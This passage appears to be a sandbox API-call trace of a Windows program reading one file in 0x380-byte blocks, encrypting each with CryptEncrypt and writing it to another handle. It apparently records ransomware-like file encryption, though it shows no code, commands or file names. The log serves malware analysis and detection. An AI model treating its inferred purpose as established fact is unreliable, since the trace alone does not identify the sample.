hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.078] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.078] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.078] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.078] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.078] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.078] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.078] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.078] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.078] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.078] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.078] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.079] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.079] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.079] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.079] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.079] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.079] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.079] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.079] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.079] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.079] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.079] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.079] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.079] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.079] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.079] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.080] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.080] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.080] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.080] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.080] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.081] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.081] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.081] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.081] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.081] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.081] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.081] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.081] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.081] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.081] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.081] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.081] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.081] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.081] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.081] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.082] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.082] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.082] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.082] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.082] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.082] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.082] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.082] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.082] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.082] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.082] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.082] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.082] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.082] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.082] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.082] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.083] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.083] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.083] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.083] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.083] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.083] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.083] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.083] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.083] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.083] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.083] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.083] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.083] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.083] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.083] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.084] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.084] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.084] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.084] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.084] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.084] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.084] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.084] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.084] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.084] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.084] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.084] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.084] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.084] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.085] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.085] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.085] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.085] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.085] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.085] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.085] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.085] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.085] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.085] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.085] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: 